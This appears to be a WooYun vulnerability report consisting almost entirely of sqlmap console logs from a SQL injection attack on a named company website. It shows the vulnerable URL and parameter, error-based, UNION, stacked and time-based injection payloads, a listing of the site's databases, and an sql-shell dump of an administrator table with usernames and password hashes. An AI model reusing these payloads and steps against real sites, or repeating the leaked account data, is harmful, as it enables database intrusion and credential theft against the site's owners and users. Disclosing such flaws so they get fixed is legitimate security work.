WooYun.org

back-end DBMS: Microsoft SQL Server 2008
[18:44:23] [INFO] fetched data logged to text files under 'E:\Sqlmap_win\Bin\out
put\glodon.com'
[*] shutting down at 18:44:23
C:\Users\Administrator.WIN7U-20150616P>sqlmap -u http://glodon.com/p/info_childc
ompany.aspx?n=subsidiary --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 18:44:52
[18:44:52] [INFO] resuming back-end DBMS 'microsoft sql server'
[18:44:52] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.glodon.com/en/'. Do you want to follow?
 [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: n
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: n=subsidiary' AND 6260=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR
(115)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (6260=6260) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(113)+CHAR(105)+CHAR(118)+CHAR(104)+CHAR(113))) AND 'jSxf'='jSxf
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: n=subsidiary' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(1
13)+CHAR(115)+CHAR(115)+CHAR(109)+CHAR(113)+CHAR(118)+CHAR(99)+CHAR(86)+CHAR(115
)+CHAR(105)+CHAR(70)+CHAR(111)+CHAR(111)+CHAR(100)+CHAR(103)+CHAR(113)+CHAR(105)
+CHAR(118)+CHAR(104)+CHAR(113),NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: n=subsidiary'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: n=subsidiary' WAITFOR DELAY '0:0:5'--
---
[18:45:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[18:45:05] [INFO] fetching database names
[18:45:05] [INFO] the SQL query used returns 4 entries
[18:45:05] [INFO] resumed: "db_menhu_en_glodon_com","db_menhu_en_glodon_com",...
[18:45:05] [INFO] resumed: "db_menhu_glodon_com","db_menhu_glodon_com","db_me...
[18:45:05] [INFO] resumed: "master","master","master","master","master"
[18:45:05] [INFO] resumed: "tempdb","tempdb","tempdb","tempdb","tempdb"
available databases [4]:
[*] db_menhu_en_glodon_com
[*] db_menhu_glodon_com
[*] master
[*] tempdb
[18:45:05] [INFO] fetched data logged to text files under 'E:\Sqlmap_win\Bin\out
put\glodon.com'
[*] shutting down at 18:45:05
C:\Users\Administrator.WIN7U-20150616P>sqlmap -u http://glodon.com/p/info_childc
ompany.aspx?n=subsidiary --sql-shell
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 18:45:33
[18:45:33] [INFO] resuming back-end DBMS 'microsoft sql server'
[18:45:33] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.glodon.com/en/'. Do you want to follow?
 [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: n
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: n=subsidiary' AND 6260=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR
(115)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (6260=6260) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(113)+CHAR(105)+CHAR(118)+CHAR(104)+CHAR(113))) AND 'jSxf'='jSxf
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: n=subsidiary' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(1
13)+CHAR(115)+CHAR(115)+CHAR(109)+CHAR(113)+CHAR(118)+CHAR(99)+CHAR(86)+CHAR(115
)+CHAR(105)+CHAR(70)+CHAR(111)+CHAR(111)+CHAR(100)+CHAR(103)+CHAR(113)+CHAR(105)
+CHAR(118)+CHAR(104)+CHAR(113),NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: n=subsidiary'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: n=subsidiary' WAITFOR DELAY '0:0:5'--
---
[18:45:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[18:45:43] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' an
d press ENTER
sql-shell> select * from Tcadmin
[18:46:03] [INFO] fetching SQL SELECT statement query output: 'select * from Tca
dmin'
[18:46:03] [INFO] you did not provide the fields in your query. sqlmap will retr
ieve the column names itself
[18:46:03] [WARNING] missing database parameter. sqlmap is going to use the curr
ent database to enumerate table(s) columns
[18:46:03] [INFO] fetching current database
[18:46:04] [INFO] fetching columns for table 'Tcadmin' in database 'db_menhu_glo
don_com'
[18:46:04] [INFO] the SQL query used returns 8 entries
[18:46:04] [INFO] resumed: "DomainAccount","nvarchar","DomainAccount","nvarch...
[18:46:04] [INFO] resumed: "ID","int","ID","int","ID","int","ID","int","ID","...
[18:46:04] [INFO] resumed: "Name","varchar","Name","varchar","Name","varchar"...
[18:46:04] [INFO] resumed: "Pid","int","Pid","int","Pid","int","Pid","int","P...
[18:46:04] [INFO] resumed: "Pwd","varchar","Pwd","varchar","Pwd","varchar","P...
[18:46:04] [INFO] resumed: "RealName","nvarchar","RealName","nvarchar","RealN...
[18:46:04] [INFO] resumed: "Remark","nvarchar","Remark","nvarchar","Remark","...
[18:46:04] [INFO] resumed: "Role","int","Role","int","Role","int","Role","int...
[18:46:04] [INFO] the query with expanded column name(s) is: SELECT DomainAccoun
t, ID, Name, Pid, Pwd, RealName, Remark, Role FROM Tcadmin
[18:46:04] [INFO] the SQL query used returns 9 entries
[18:46:04] [INFO] resumed: "a","6","a","1","C00F92FAD33BDEE6524183293AC0E51C"...
[18:46:04] [INFO] resumed: "admin","2","admin","3","C00F92FAD33BDEE6524183293...
[18:46:04] [INFO] resumed: "b","7","b","1","C00F92FAD33BDEE6524183293AC0E51C"...
[18:46:04] [INFO] resumed: "c","8","c","1","C00F92FAD33BDEE6524183293AC0E51C"...
[18:46:04] [INFO] resumed: "d","9","d","1","C00F92FAD33BDEE6524183293AC0E51C"...
[18:46:04] [INFO] resumed: "fabu","4","fabu","1","C00F92FAD33BDEE6524183293AC...
[18:46:04] [INFO] resumed: "licaix","12","licaix","2","C00F92FAD33BDEE6524183...
[18:46:04] [INFO] resumed: "yiji","1","yiji","2","C00F92FAD33BDEE6524183293AC...
[18:46:04] [INFO] resumed: "zhangzong","3","xitong","2","C00F92FAD33BDEE65241...
select * from Tcadmin [45]:
[*] fabu, 4, fabu, 1, C00F92FAD33BDEE6524183293AC0E51C, ?????, , 1074
[*] licaix, 12, licaix, 2, C00F92FAD33BDEE6524183293AC0E51C, ???, , 1074
[*] yiji, 1, yiji, 2, C00F92FAD33BDEE6524183293AC0E51C, ??, , 1073
[*] zhangzong, 3, xitong, 2, C00F92FAD33BDEE6524183293AC0E51C, ??, , 1071
。。。
sql-shell>